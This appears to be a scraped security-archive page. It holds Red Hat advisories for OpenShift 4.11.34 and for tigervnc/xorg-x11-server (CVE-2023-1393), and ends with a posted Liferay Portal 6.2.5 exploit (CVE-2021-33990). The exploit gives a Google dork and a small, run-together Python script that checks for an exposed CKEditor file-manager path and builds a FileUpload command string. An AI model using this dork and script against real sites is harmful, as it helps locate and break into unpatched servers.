hY6n+5BcvGLpqDkyYelp4zaoCwnlSJRsXOJMBW5shF/9QfB1eWT7dU3bxnl+MPUO  
tZ0iUmZjbzBsjvgiQ22377jDuhdMk95lRgaRF8kdy13cavaykF5MA2hitfIiucL7  
pG8zVEKEY3A=  
=vuaR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1630-01

Red Hat Security Advisory 2023-1504-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.34.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.34 bug fix and security update  
Advisory ID:       RHSA-2023:1504-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1504  
Issue date:        2023-04-04  
CVE Names:         CVE-2021-20329 CVE-2022-4318 CVE-2023-0286   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.34 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.34. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:1503

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Security Fix(es):

* mongo-go-driver: specific cstrings input may not be properly validated  
(CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:dbfa0881b5814ca79c1cd991fc890b666561b4ca58b3f673d79a31c900a0efbb

(For s390x architecture)  
The image digest is  
sha256:b30fabcb5886123ffde14cb306208484d58843d93d1c1a315533d3ae825fccec

(For ppc64le architecture)  
The image digest is  
sha256:88c4e73c995260d8b6ea5ea3a99915f67730c7bdd4016cadfdd8b1b090c76507

(For aarch64 architecture)  
The image digest is  
sha256:df1bab4bbd42ebace4557c60e392329ba1fe86ab23565c60efbaf51110f4c019

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1971033 - CVE-2021-20329 mongo-go-driver: specific cstrings input may not be properly validated

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10382 - cluster-machine-approver doesn't ignore case for CSR hostnames  
OCPBUGS-10486 - node healthz server is missing in ovnk  
OCPBUGS-10671 - Risk cache warming takes too long on channel changes  
OCPBUGS-10772 - TestNewAppRun unit test failing  
OCPBUGS-2303 - Stale chassis are not removed  
OCPBUGS-7562 - Context Deadline exceeded when PTP service is disabled from the switch  
OCPBUGS-9260 - Should update the default go image to be 1.17 for hybird operator  
OCPBUGS-9398 - "operator-sdk run bundle" generates 2 install plans, operator-sdk run bundle-upgrade failed  
OCPBUGS-9399 - "operator-sdk run bundle-upgrade" approve the wrong install plan  
OCPBUGS-9986 - MTU migration configuration is cleaned up prematurely while in progress

6. References:

https://access.redhat.com/security/cve/CVE-2021-20329  
https://access.redhat.com/security/cve/CVE-2022-4318  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/ydzjgjWX9erEAQgF9hAAidtA7NVMHpeQ/KyFO8HeVbNa8J4BVyW3  
M8rGZy0ySYnN8HrkBLvO91ZsEoGVEjyAv07u6pfeGPYM0kfg60KcZOaAUJIjNlpX  
T4yUZtSlwT8ebUPb0DbG/8NCaLutL9Yci0GxLEQV+Q0bxiNdfjX4g36mxRSiY+CH  
DLFakU7iCvGnL8AAMrbqJZIwNF5BpuKsqvr7wlTNL7ATEd3zsBWjoWbsk4wZTCJI  
nTdEr/NE7J8l7RZPGg1+FvSAvmEahzuDuKt/1Dq8NyeAnbq1WMNU4nXpBUD9q9Dj  
DWj3fYorwtOfHFH4PnUlBjghH08+gYQ+8XX5ByqvYSyhAg7yDRr+EeRDAXDEKjjO  
Pt8Jr7DT0Nks0WqId6B39na0z4EN/U70b8LNcmidUvk5vAEf3LQJjOF58LJSHKTo  
vuMwy0TDbtTI6BEccQueS50p4kRJQ9hIdKbQG75grYobQgS3CEjeb3DkZ3p9tSrf  
CD2CcaX+TQWpkBxZbexLR7KhPr0EcWHxWlFA/1QFk+8A0yCLZmih/h/igHd17fiR  
6pqOMaZp6oGaS5bSoQkkkKtC0+GChmsK20hO3Yc6YAFvfqpAo+drVYK4hJXs2D/i  
Sv4tpdAL3Y3Q7az3VbWvz9hYmlyJDz1wGFv+dl6efe72Qy0i3efzNeVwaCVODABz  
5auCVUBnyQs=  
=Yw0Z  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1504-01

Red Hat Security Advisory 2023-1600-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:1600-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1600  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
tigervnc-1.9.0-16.el8_1.3.src.rpm

aarch64:  
tigervnc-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-16.el8_1.3.noarch.rpm  
tigervnc-license-1.9.0-16.el8_1.3.noarch.rpm  
tigervnc-server-applet-1.9.0-16.el8_1.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/MNzjgjWX9erEAQiZOQ/9GfEZZmz5QHzTHPeD8+Mm2XqYLy5qTw2K  
BwYmh29U+xpEc1bNWY5MTs7Ae9QmOmSl3MQH8R42JAObYzjPUjfjz4ZPd8lJgE4E  
Jkk8O40iKqZ0Hvk9y7v2ag5TdEv1uYTOi+lAphIpAQKUNUGxS6uvjhSzey74j/EY  
3XOTurHs5c2e/odvmUM4DKLGre0lT4m52P/QYqj2okD/VE1YmeU1vi1F04PXrhGW  
1WtVPLdZj4zh2XoRpxAgkoUWQcHm/KxjTIDGGl2BtPcEFLZEv9FSgjfnSJLvLaq+  
K6wwBPkEFarmOvc02vF7T2zygQfHTtEQMRa1TxVGRmSXfd3rYENFRRLDqu1QTkku  
Ew9N5dwUf94PcvlcZaSNzI6YTSV3Z1l0Rik7bfnoa7+JxfolVww9QaWLxatNuLeh  
i1oqgO+LmvWkr4HpC1HoDcTHSXJteUoVeUz2UU8lM9JkVTyKvJoryxfVBAigTeqV  
g+LOXU09+Hxus1jl0IvXFBZ2GBwQSqbLX1s9+UpWo79Qt8pnKkMrSW+L50gr/SMB  
nuCAU7BGB3n62NXhEUmVOdASGyNe2uRAG3tvaK5mDH15wXYFdW7fhyLxKMQVZzto  
g/L196/6ckB8e6+C36e15XHWj6ODaY8gaPv9FJdcPaAqnTxquxiCYj8zY/1Fswv6  
l5qbN6r66cY=  
=1bjZ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1600-01

Red Hat Security Advisory 2023-1594-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc and xorg-x11-server security update  
Advisory ID:       RHSA-2023:1594-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1594  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc and xorg-x11-server is now available for Red Hat  
Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

X.Org is an open-source implementation of the X Window System. It provides  
the basic low-level functionality that full-fledged graphical user  
interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm

noarch:  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

ppc64:  
tigervnc-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.ppc64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.ppc64le.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64le.rpm

s390x:  
tigervnc-1.8.0-25.el7_9.s390x.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.s390x.rpm  
tigervnc-server-1.8.0-25.el7_9.s390x.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.s390x.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.s390x.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

ppc64:  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.ppc64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-module-1.8.0-25.el7_9.ppc64le.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.s390x.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/LtzjgjWX9erEAQiXQQ//YJZInT4twZ3D/vsM319cZtvZpZCTIAoY  
1x2/lWGIUJsZ5fojf6VFY0raK/iSs4ZQrodt+lEixJn/fq34zCvM5cWDiqIibKRN  
4dz0aO/M4ot/lXtCGDiq85t0ejWz4T47ivinAcYXCyMO78AHu5r6n2l7TGBzIwjt  
dlfTE4K7btDpM6p1aqx6llHaq057bG5MMS/VoY8bmPV6/N9rFN2IeU8c1JmzSFN0  
W38GfJ0Pv8EtxFBrGLFrrRT3kWoBFe7iu1m3z4qaOXJ5EvyIQDDACkqhQb6ZGv1K  
T+waZy/nRGKBYYDgVEUQhCt17h2GuRqOqPKAWzMpmXgQ98LbH9d367EpMaevvQtl  
qlBbx/GAvPlqn9/VF6dNKx8EO8Asx99SY6Wnu3N2YHTSkCgCbGultbWg62btJKJE  
v50Su9xikzO1mNuSvYIagFPN0MOcdR9cJuTjMgVjgY2yCZKONilJRznQTlXuaUBn  
kRR1wwaU/vpTb936Ka4mgsY7NhXoQnyF0pgx6dTD3Q4rj40114W5tWlhSJJ6pRum  
1qFSzSNm+BGlirytDodjEInkMJvaHFuzXGkvseCgROtFyUWkvpkqWFuWvW0g4F6e  
yktfCPFP3dKPCAohgmkaZzgCGBRjz7Do+5/OAd5QN7gT+oMNBaHSr+pM+4hdiVRr  
NWwFhE95uHk=  
=tIcO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1594-01

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
